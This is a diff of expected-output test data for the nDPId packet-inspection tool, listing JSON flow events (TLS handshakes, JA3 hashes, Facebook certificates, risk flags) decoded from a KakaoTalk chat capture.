{"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
-01716{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069031236,"flow_last_seen":1430069031408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4141,"flow_avg_l4_payload_len":414,"midstream":0,"ts_msec":1430069031408,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
+00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031236,"flow_last_seen":1430069031286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":570,"flow_tot_l4_payload_len":570,"flow_avg_l4_payload_len":142,"midstream":0,"ts_msec":1430069031286,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":161,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031236,"flow_last_seen":1430069031391,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1850,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1430069031391,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
+01822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069031236,"flow_last_seen":1430069031408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4141,"flow_avg_l4_payload_len":414,"midstream":0,"ts_msec":1430069031408,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031611,"flow_last_seen":1430069031611,"flow_idle_time":7440000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":1,"ts_msec":1430069031611,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1430069031611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":113,"pkt_l4_len":77,"ts_msec":1430069031611,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGHTnUAAQAbVXgoYUrw2\/\/3H5i8UZ+uf0VkGiXPCgBgCYxkQAAABAQgKAAKTKDTnT0kXAwEAKNOo\/lFrrxEtj1oyrBEybZXAvF7754xqLjvuYfV0gCpDpumAA3\/lW60="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035398,"flow_last_seen":1430069035398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069035398,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
@@ -155,21 +155,21 @@
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1430069035840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069035840,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADytk0AAPwbN8woYUrwfDURUkrUAUM0qoIsAAAAAoAI5CEEgAAACBAV4BAIICgALDRgAAAAAAQMDBw=="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1430069035877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1430069035877,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxm7kAA+AZbqB8NRFQKGFK8AFCStWTibgPNKqCMYBIRHPNeAAACBAV4"}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1430069035880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"ts_msec":1430069035880,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACitlEAAPwbOBgoYUrwfDURUkrUAUM0qoIxk4m4EUBA5COLzAAA="}
-00818{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035840,"flow_last_seen":1430069035921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069035921,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}}
+00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035840,"flow_last_seen":1430069035921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069035921,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035967,"flow_last_seen":1430069035967,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1430069035967,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1430069035967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069035967,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzw1UAAPwaKsQoYUrwfDURUsJ0Bu3W4\/fMAAAAAoAI5CBvJAAACBAV4BAIICgALDSYAAAAAAQMDBw=="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1430069036008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1430069036008,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxGQkAA+AZ8VB8NRFQKGFK8AbuwnWIYU8F1uP30YBIRHOshAAACBAV4"}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1430069036010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"ts_msec":1430069036010,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjw1kAAPwaKxAoYUrwfDURUsJ0Bu3W4\/fRiGFPCUBA5CNq2AAA="}
-00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069035967,"flow_last_seen":1430069036012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1430069036012,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069035967,"flow_last_seen":1430069036012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1430069036012,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069036068,"flow_last_seen":1430069036068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1430069036068,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1430069036068,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069036068,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwqSkAAPwalnwoYUryt\/GECircBu1PEJ3oAAAAAoAI5CI51AAACBAV4BAIICgALDTAAAAAAAQMDBw=="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1430069036109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1430069036109,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACzrl0AA+AYrYa38YQIKGFK8AbuKt2bo6WFTxCd7YBIRHMNnAAACBAV4"}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1430069036113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"ts_msec":1430069036113,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgqS0AAPwalsgoYUryt\/GECircBu1PEJ3tm6OliUBA5CLL8AAA="}
-00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069036068,"flow_last_seen":1430069036116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1430069036116,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069035967,"flow_last_seen":1430069036121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"ts_msec":1430069036121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
-01687{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069035967,"flow_last_seen":1430069036179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1430069036179,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
-00898{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":258,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069036068,"flow_last_seen":1430069036608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"ts_msec":1430069036608,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
-01687{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1430069036068,"flow_last_seen":1430069036612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":414,"midstream":0,"ts_msec":1430069036612,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069036068,"flow_last_seen":1430069036116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1430069036116,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069035967,"flow_last_seen":1430069036121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"ts_msec":1430069036121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
+01792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069035967,"flow_last_seen":1430069036179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1430069036179,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 